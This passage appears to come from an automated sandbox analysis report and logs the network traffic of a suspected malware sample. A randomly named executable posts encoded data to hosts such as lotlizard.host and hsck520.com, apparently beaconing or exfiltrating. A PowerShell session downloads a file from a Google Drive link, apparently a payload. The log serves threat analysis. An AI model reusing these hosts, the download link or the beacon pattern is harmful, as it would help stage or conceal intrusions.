            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
            Sep 16, 2024 14:46:44.703139067 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.44974566.29.141.40805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:46:46.655886889 CEST10821OUTPOST /alsy/ HTTP/1.1
            Host: www.lotlizard.host
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en
            Connection: close
            Cache-Control: no-cache
            Content-Length: 10300
            Content-Type: application/x-www-form-urlencoded
            Origin: http://www.lotlizard.host
            Referer: http://www.lotlizard.host/alsy/
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Data Raw: 37 4a 50 3d 68 48 67 35 30 33 4d 2f 53 6a 6e 56 4a 79 2f 5a 39 35 75 67 58 46 49 70 4c 43 75 7a 6e 47 36 54 6e 71 43 34 4c 72 55 7a 42 49 7a 63 54 2b 37 52 45 33 50 6a 59 6d 6c 6a 4e 74 4c 6a 71 6d 32 79 43 63 64 70 42 58 4b 41 36 57 58 7a 4c 64 36 34 48 50 54 50 31 74 36 63 65 38 52 69 65 72 71 59 67 79 43 58 72 66 48 36 52 35 56 4c 67 61 6b 6c 6a 5a 48 43 72 79 47 58 52 62 57 6b 53 31 66 4d 45 6b 5a 47 39 30 79 77 50 43 50 39 6b 63 74 4f 44 6a 57 77 53 4c 45 7a 78 2b 6d 32 54 54 45 79 4b 68 2b 68 51 76 34 51 59 75 41 49 71 6e 67 31 76 66 77 38 71 49 5a 48 36 54 74 44 64 6d 72 38 73 54 48 6f 2f 2f 36 66 65 56 33 73 43 52 41 67 76 6f 6c 43 33 74 4c 44 49 66 4a 4b 75 6c 6b 33 72 6f 47 32 58 33 34 2f 73 6a 64 43 4b 32 50 6f 54 2f 70 47 36 75 6b 4e 64 64 71 61 32 6c 48 4c 77 39 6e 58 71 63 74 4a 32 35 31 2f 4e 62 53 39 57 45 46 35 34 56 51 48 74 52 67 30 76 64 4a 70 65 74 4e 78 42 43 48 5a 75 6a 4a 48 46 58 36 53 4e 45 56 71 58 64 4d 68 31 42 2f 41 74 79 70 66 6a 39 75 76 36 55 6c 46 38 35 41 42 6a 73 [TRUNCATED]
            Data Ascii: 7JP=hHg503M/SjnVJy/Z95ugXFIpLCuznG6TnqC4LrUzBIzcT+7RE3PjYmljNtLjqm2yCcdpBXKA6WXzLd64HPTP1t6ce8RierqYgyCXrfH6R5VLgakljZHCryGXRbWkS1fMEkZG90ywPCP9kctODjWwSLEzx+m2TTEyKh+hQv4QYuAIqng1vfw8qIZH6TtDdmr8sTHo//6feV3sCRAgvolC3tLDIfJKulk3roG2X34/sjdCK2PoT/pG6ukNddqa2lHLw9nXqctJ251/NbS9WEF54VQHtRg0vdJpetNxBCHZujJHFX6SNEVqXdMh1B/Atypfj9uv6UlF85ABjstN+KMzxKblmbzLo3D8rClSf7HwQJOWurB+zv2Usr8pnw8/9WAP24ZGxEP4VLZG/Q2Ti7h/ht1uqCmVpxHmZgUusGpz2f2xRH7Kgw8v6udEOxJ1DZ0wjPVoAU6X6lMil0++5eIvtueHLxnQStLk1VwULNHPgceBKCbqvoGZlgAAgYuf2oin3o9P0lABN23R+IJz2T8O4u9Sygz2+NCNpJNhZ3squq+9VwBkMcIIJL8GyLxsKqzIejfpn5Xbes5YGY4n2YqfMxCHx+KiqsX10QSbb5ZflmLzYYEnH6FFjz3e6ImK0kfxTvXEb2vBDW4C9p05IKmjqicof5wX/7HiWhFP4MrT9ih7hvP89CGwGhvsLiref4akV+rVeHPDTtBYz5+z+vsDcV3YPat7M7NDopAEKmRnPii+9BE5GkWSIEW7daTB0TxzQGScT6Ma6Q0oeY5I+uOaVe1RN60mlxxj+9cia5TdziHiHHUn4JeSF4CZXL/7PdDQQq8E/rEr6zp17tCLVABccOc71weP+7Sn6AiKNZXPJTjor7s0lozok+jXpjS3VUGJ6DORZrhUs65D4fFlGE/rIQpc2iKDGMk6rh+2Vcz9qacH1px7hfhEiSN6vNe7ZNQi6OH3r8Irnx5JfxQJ8eTJ3knyeVPOwOAKLMRJ/CalOlyGKxQ8 [TRUNCATED]
            Sep 16, 2024 14:46:47.229249954 CEST1236INHTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 16 Sep 2024 12:46:47 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
            Sep 16, 2024 14:46:47.229305983 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.44974666.29.141.40805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:46:49.202543974 CEST454OUTGET /alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH1 HTTP/1.1
            Host: www.lotlizard.host
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Sep 16, 2024 14:46:49.774950981 CEST1236INHTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 16 Sep 2024 12:46:49 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
            Sep 16, 2024 14:46:49.774979115 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.44974735.190.52.58805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:47:04.193875074 CEST710OUTPOST /hfh5/ HTTP/1.1
            Host: www.hsck520.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en
            Connection: close
            Cache-Control: no-cache
            Content-Length: 200
            Content-Type: application/x-www-form-urlencoded
            Origin: http://www.hsck520.com
            Referer: http://www.hsck520.com/hfh5/
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Data Raw: 37 4a 50 3d 62 43 71 44 63 49 31 6f 55 57 63 6d 61 7a 33 32 62 5a 49 2f 33 71 44 6e 4d 55 74 6d 67 69 73 32 4a 5a 66 4d 54 58 45 64 66 72 68 61 62 51 68 42 39 43 41 42 45 66 46 78 6f 31 69 72 38 6e 79 7a 73 57 74 53 37 73 78 36 62 4a 63 63 77 50 6b 4e 77 68 7a 53 59 77 46 4b 4f 44 36 38 4c 68 58 68 71 4e 2f 59 7a 69 66 38 68 67 32 56 64 68 30 6d 6d 55 78 49 37 78 39 61 49 48 31 41 37 48 73 2f 57 72 6d 33 51 4e 4e 68 7a 2b 47 71 38 4c 70 69 53 38 43 4e 59 4e 6d 44 54 4b 69 43 39 70 39 45 2f 6e 6e 38 32 74 56 52 76 46 6d 56 66 4e 30 65 42 52 7a 46 62 70 73 4b 55 70 69 76 61 6b 47 45 31 51 3d 3d
            Data Ascii: 7JP=bCqDcI1oUWcmaz32bZI/3qDnMUtmgis2JZfMTXEdfrhabQhB9CABEfFxo1ir8nyzsWtS7sx6bJccwPkNwhzSYwFKOD68LhXhqN/Yzif8hg2Vdh0mmUxI7x9aIH1A7Hs/Wrm3QNNhz+Gq8LpiS8CNYNmDTKiC9p9E/nn82tVRvFmVfN0eBRzFbpsKUpivakGE1Q==
            Sep 16, 2024 14:47:04.841710091 CEST176INHTTP/1.1 405 Method Not Allowed
            Server: nginx/1.20.2
            Date: Mon, 16 Sep 2024 12:47:04 GMT
            Content-Type: text/html
            Content-Length: 559
            Via: 1.1 google
            Connection: close
            Sep 16, 2024 14:47:04.842608929 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.44974835.190.52.58805596C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
            TimestampBytes transferredDirectionData
            Sep 16, 2024 14:47:06.736052036 CEST730OUTPOST /hfh5/ HTTP/1.1
            Host: www.hsck520.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en
            Connection: close
            Cache-Control: no-cache
            Content-Length: 220
            Content-Type: application/x-www-form-urlencoded
            Origin: http://www.hsck520.com
            Referer: http://www.hsck520.com/hfh5/
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Data Raw: 37 4a 50 3d 62 43 71 44 63 49 31 6f 55 57 63 6d 56 33 4c 32 59 2b 55 2f 2f 71 44 6b 41 30 74 6d 75 43 73 79 4a 5a 62 4d 54 57 41 4e 65 5a 46 61 61 79 35 42 36 47 63 42 48 66 46 78 6a 56 69 55 6b 48 79 6b 73 57 67 6e 37 73 39 36 62 4a 34 63 77 4b 59 4e 77 79 4c 54 59 67 46 49 42 6a 36 2b 45 42 58 68 71 4e 2f 59 7a 69 4b 68 68 67 75 56 64 52 45 6d 6e 78 46 4c 6e 42 39 5a 42 6e 31 41 2f 48 74 32 57 72 6d 46 51 4a 45 4f 7a 39 75 71 38 4a 68 69 53 70 2b 4f 57 4e 6e 49 64 71 6a 4b 36 72 73 2b 33 45 61 75 70 75 55 33 6e 6d 4b 32 61 4c 6c 45 51 67 53 53 4a 70 49 35 4a 75 72 62 58 6e 37 4e 75 58 73 6b 44 6b 36 75 63 77 48 65 42 4d 53 42 79 73 62 67 75 57 77 3d
            Data Ascii: 7JP=bCqDcI1oUWcmV3L2Y+U//qDkA0tmuCsyJZbMTWANeZFaay5B6GcBHfFxjViUkHyksWgn7s96bJ4cwKYNwyLTYgFIBj6+EBXhqN/YziKhhguVdREmnxFLnB9ZBn1A/Ht2WrmFQJEOz9uq8JhiSp+OWNnIdqjK6rs+3EaupuU3nmK2aLlEQgSSJpI5JurbXn7NuXskDk6ucwHeBMSBysbguWw=
            Sep 16, 2024 14:47:07.378307104 CEST176INHTTP/1.1 405 Method Not Allowed
            Server: nginx/1.20.2
            Date: Mon, 16 Sep 2024 12:47:07 GMT
            Content-Type: text/html
            Content-Length: 559
            Via: 1.1 google
            Connection: close
            Sep 16, 2024 14:47:07.381711960 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449730142.250.185.1104437512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-09-16 12:45:06 UTC215OUTGET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-09-16 12:45:06 UTC1610INHTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Mon, 16 Sep 2024 12:45:06 GMT
            Location: https://drive.usercontent.google.com/download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download
            Strict-Transport-Security: max-age=31536000
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Cross-Origin-Opener-Policy: same-origin
            Content-Security-Policy: script-src 'nonce-AiSmatAGnfQDQtQapzdgUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449731142.250.185.1104437512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-09-16 12:45:11 UTC121OUTGET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1
            Host: drive.google.com
            Connection: Keep-Alive
            2024-09-16 12:45:11 UTC1319INHTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Mon, 16 Sep 2024 12:45:11 GMT
            Location: https://drive.usercontent.google.com/download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download
            Strict-Transport-Security: max-age=31536000
            Cross-Origin-Opener-Policy: same-origin
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Content-Security-Policy: script-src 'report-sample' 'nonce--Bar4IuWlsGuizydNQHw4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.449732142.250.185.1934437512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-09-16 12:45:12 UTC139OUTGET /download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download HTTP/1.1
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-09-16 12:45:14 UTC4850INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Azures.sea"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 485664
            Last-Modified: Sun, 15 Sep 2024 20:48:14 GMT
            X-GUploader-UploadID: AD-8ljtp7ggYdGNqE2mC-QJRdPw0Fn3bTKxYGJbNE-04dzqmCXy_HFGwMZFYdWVAAym-WZUXTbjZE6ySAw
            Date: Mon, 16 Sep 2024 12:45:14 GMT
            Expires: Mon, 16 Sep 2024 12:45:14 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=YIY3OA==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
